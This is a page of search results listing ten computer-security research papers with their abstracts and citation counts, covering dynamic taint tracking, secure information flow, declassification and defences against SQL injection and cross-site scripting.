Results 1 - 10
of
827
TaintDroid: An Information-Flow Tracking System for Realtime Privacy Monitoring on Smartphones
, 2010
"... Today’s smartphone operating systems fail to provide users with adequate control and visibility into how third-party applications use their private data. We present TaintDroid, an efficient, system-wide dynamic taint tracking and analysis system for the popular Android platform that can simultaneous ..."
Abstract
-
Cited by 527 (26 self)
- Add to MetaCart
Today’s smartphone operating systems fail to provide users with adequate control and visibility into how third-party applications use their private data. We present TaintDroid, an efficient, system-wide dynamic taint tracking and analysis system for the popular Android platform that can simultaneously track multiple sources of sensitive data. TaintDroid’s efficiency to perform real-time analysis stems from its novel system design that leverages the mobile platform’s virtualized system architecture. TaintDroid incurs only 14 % performance overhead on a CPU-bound micro-benchmark with little, if any, perceivable overhead when running thirdparty applications. We use TaintDroid to study the behavior of 30 popular third-party Android applications and find several instances of misuse of users ’ private information. We believe that TaintDroid is the first working prototype demonstrating that dynamic taint tracking and analysis provides informed use of third-party applications in existing smartphone operating systems.
Securing Web Application Code by Static Analysis and Runtime Protection
, 2004
"... Security remains a major roadblock to universal acceptance of the Web for many kinds of transactions, especially since the recent sharp increase in remotely exploitable vulnerabilities has been attributed to Web application bugs. Many verification tools are discovering previously unknown vulnerabili ..."
Abstract
-
Cited by 234 (2 self)
- Add to MetaCart
(Show Context)
Security remains a major roadblock to universal acceptance of the Web for many kinds of transactions, especially since the recent sharp increase in remotely exploitable vulnerabilities has been attributed to Web application bugs. Many verification tools are discovering previously unknown vulnerabilities in legacy C programs, raising hopes that the same success can be achieved with Web applications. In this paper, we describe a sound and holistic approach to ensuring Web application security. Viewing Web application vulnerabilities as a secure information flow problem, we created a lattice-based static analysis algorithm derived from type systems and typestate, and addressed its soundness. During the analysis, sections of code considered vulnerable are instrumented with runtime guards, thus securing Web applications in the absence of user intervention. With sufficient annotations, runtime overhead can be reduced to zero. We also created a tool named WebSSARI (Web application Security by Static Analysis and Runtime Inspection) to test our algorithm, and used it to verify 230 open-source Web application projects on SourceForge.net, which were selected to represent projects of different maturity, popularity, and scale. 69 contained vulnerabilities and their developers were notified. 38 projects acknowledged our findings and stated their plans to provide patches. Our statistics also show that static analysis reduced potential runtime overhead by 98.4%.
Taint-enhanced policy enforcement: A practical approach to defeat a wide range of attacks
- In the Proc. of the 15th USENIX Security Symp
, 2006
"... Policy-based confinement, employed in SELinux and specification-based intrusion detection systems, is a popular approach for defending against exploitation of vulnerabilities in benign software. Conventional access control policies employed in these approaches are effective in detecting privilege es ..."
Abstract
-
Cited by 202 (10 self)
- Add to MetaCart
(Show Context)
Policy-based confinement, employed in SELinux and specification-based intrusion detection systems, is a popular approach for defending against exploitation of vulnerabilities in benign software. Conventional access control policies employed in these approaches are effective in detecting privilege escalation attacks. However, they are unable to detect attacks that “hijack ” legitimate access privileges granted to a program, e.g., an attack that subverts an FTP server to download the password file. (Note that an FTP server would normally need to access the password file for performing user authentication.) Some of the common attack types reported today, such as SQL injection and cross-site scripting, involve such subversion of legitimate access privileges. In this paper, we present a new approach to strengthen policy enforcement by augmenting security policies with information about the trustworthiness of data used in securitysensitive operations. We evaluated this technique using 9 available exploits involving several popular software packages containing the above types of vulnerabilities. Our technique sucessfully defeated these exploits. 1
Automatically hardening web applications using precise tainting
- In 20th IFIP International Information Security Conference
, 2005
"... Most web applications contain security vulnerabilities. The simple and natural ways of creating a web application are prone to SQL injection attacks and cross-site scripting attacks (among other less common vulnerabilities). In response, many tools have been developed for detecting or mitigating com ..."
Abstract
-
Cited by 191 (3 self)
- Add to MetaCart
(Show Context)
Most web applications contain security vulnerabilities. The simple and natural ways of creating a web application are prone to SQL injection attacks and cross-site scripting attacks (among other less common vulnerabilities). In response, many tools have been developed for detecting or mitigating common web application vulnerabilities. Existing techniques either require effort from the site developer or are prone to false positives. This paper presents a fully automated approach to securely hardening web applications. It is based on precisely tracking taintedness of data and checking specifically for dangerous content in only in parts of commands and output that came from untrustworthy sources. Unlike previous work in which everything that is derived from tainted input is tainted, our approach precisely tracks taintedness within data values. We describe our results and prototype implementation on the predominant LAMP (Linux, Apache, MySQL, PHP) platform. 1.
Robust Declassification
- in Proc. IEEE Computer Security Foundations Workshop
, 2001
"... Security properties based on information flow, such as noninterference, provide strong guarantees that confidentiality is maintained. However, programs often need to leak some amount of confidential information in order to serve their intended purpose, and thus violate noninterference. Real systems ..."
Abstract
-
Cited by 165 (26 self)
- Add to MetaCart
(Show Context)
Security properties based on information flow, such as noninterference, provide strong guarantees that confidentiality is maintained. However, programs often need to leak some amount of confidential information in order to serve their intended purpose, and thus violate noninterference. Real systems that control information flow often include mechanisms for downgrading or declassifying information; however, declassification can easily result in the unexpected release of confidential information.
Separating agreement from execution for byzantine fault tolerant services
- IN PROC. SOSP
, 2003
"... We describe a new architecture for Byzantine fault tolerant state machine replication that separates agreement that orders requests from execution that processes requests. This separation yields two fundamental and practically significant advantages over previous architectures. First, it reduces rep ..."
Abstract
-
Cited by 161 (18 self)
- Add to MetaCart
(Show Context)
We describe a new architecture for Byzantine fault tolerant state machine replication that separates agreement that orders requests from execution that processes requests. This separation yields two fundamental and practically significant advantages over previous architectures. First, it reduces replication costs because the new architecture can tolerate faults in up to half of the state machine replicas that execute requests. Previous systems can tolerate faults in at most a third of the combined agreement/state machine replicas. Second, separating agreement from execution allows a general privacy firewall architecture to protect confidentiality through replication. In contrast, replication in previous systems hurts confidentiality because exploiting the weakest replica can be su#cient to compromise the system. We have constructed a prototype and evaluated it running both microbenchmarks and an NFS server. Overall, we find that the architecture adds modest latencies to unreplicated systems and that its performance is competitive with existing Byzantine fault tolerant systems.
Dimensions and Principles of Declassification
, 2005
"... Computing systems often deliberately release (or declassify) sensitive information. A principal security concern for systems permitting information release is whether this release is safe: is it possible that the attacker compromises the information release mechanism and extracts more secret informa ..."
Abstract
-
Cited by 142 (16 self)
- Add to MetaCart
Computing systems often deliberately release (or declassify) sensitive information. A principal security concern for systems permitting information release is whether this release is safe: is it possible that the attacker compromises the information release mechanism and extracts more secret information than intended? While the security community has recognised the importance of the problem, the state-of-theart in information release is, unfortunately, a number of approaches with somewhat unconnected semantic goals. We provide a road map of the main directions of current research, by classifying the basic goals according to what information is released, who releases information, where in the system information is released, and when information can be released. With a general declassification framework as a long-term goal, we identify some prudent principles of declassification. These principles shed light on existing definitions and may also serve as useful "sanity checks" for emerging models.
All you ever wanted to know about dynamic taint analysis and forward symbolic execution (but might have been afraid to ask
- In Proceedings of the IEEE Symposium on Security and Privacy
, 2010
"... Abstract—Dynamic taint analysis and forward symbolic execution are quickly becoming staple techniques in security analyses. Example applications of dynamic taint analysis and forward symbolic execution include malware analysis, input filter generation, test case generation, and vulnerability discove ..."
Abstract
-
Cited by 106 (5 self)
- Add to MetaCart
(Show Context)
Abstract—Dynamic taint analysis and forward symbolic execution are quickly becoming staple techniques in security analyses. Example applications of dynamic taint analysis and forward symbolic execution include malware analysis, input filter generation, test case generation, and vulnerability discovery. Despite the widespread usage of these two techniques, there has been little effort to formally define the algorithms and summarize the critical issues that arise when these techniques are used in typical security contexts. The contributions of this paper are two-fold. First, we precisely describe the algorithms for dynamic taint analysis and forward symbolic execution as extensions to the run-time semantics of a general language. Second, we highlight important implementation choices, common pitfalls, and considerations when using these techniques in a security context. Keywords-taint analysis, symbolic execution, dynamic analysis I.
Cross-Site Scripting Prevention with Dynamic Data Tainting and Static Analysis
- In Proceeding of the Network and Distributed System Security Symposium (NDSS’07
, 2007
"... Cross-site scripting (XSS) is an attack against web applications in which scripting code is injected into the output of an application that is then sent to a user’s web browser. In the browser, this scripting code is executed and used to transfer sensitive data to a third party (i.e., the attacker). ..."
Abstract
-
Cited by 104 (2 self)
- Add to MetaCart
(Show Context)
Cross-site scripting (XSS) is an attack against web applications in which scripting code is injected into the output of an application that is then sent to a user’s web browser. In the browser, this scripting code is executed and used to transfer sensitive data to a third party (i.e., the attacker). Currently, most approaches attempt to prevent XSS on the server side by inspecting and modifying the data that is exchanged between the web application and the user. Unfortunately, it is often the case that vulnerable applications are not fixed for a considerable amount of time, leaving the users vulnerable to attacks. The solution presented in this paper stops XSS attacks on the client side by tracking the flow of sensitive information inside the web browser. If sensitive information is about to be transferred to a third party, the user can decide if this should be permitted or not. As a result, the user has an additional protection layer when surfing the web, without solely depending on the security of the web application. 1
A Theorem Proving Approach to Analysis of Secure Information Flow
, 2003
"... Most attempts at analysing secure information flow in programs are based on domain-specific logics. Though computationally feasible, these approaches suffer from the need for abstraction and the high cost of building dedicated tools for real programming languages. We recast the information flow prob ..."
Abstract
-
Cited by 104 (10 self)
- Add to MetaCart
Most attempts at analysing secure information flow in programs are based on domain-specific logics. Though computationally feasible, these approaches suffer from the need for abstraction and the high cost of building dedicated tools for real programming languages. We recast the information flow problem in a general program logic rather than a problem-specific one. We investigate the feasibility of this approach by showing how a general purpose tool for software verification can be used to perform information ow analyses. We are able to handle phenomena like method calls, loops, and object types for the target language Java Card. We are also able to prove insecurity of programs.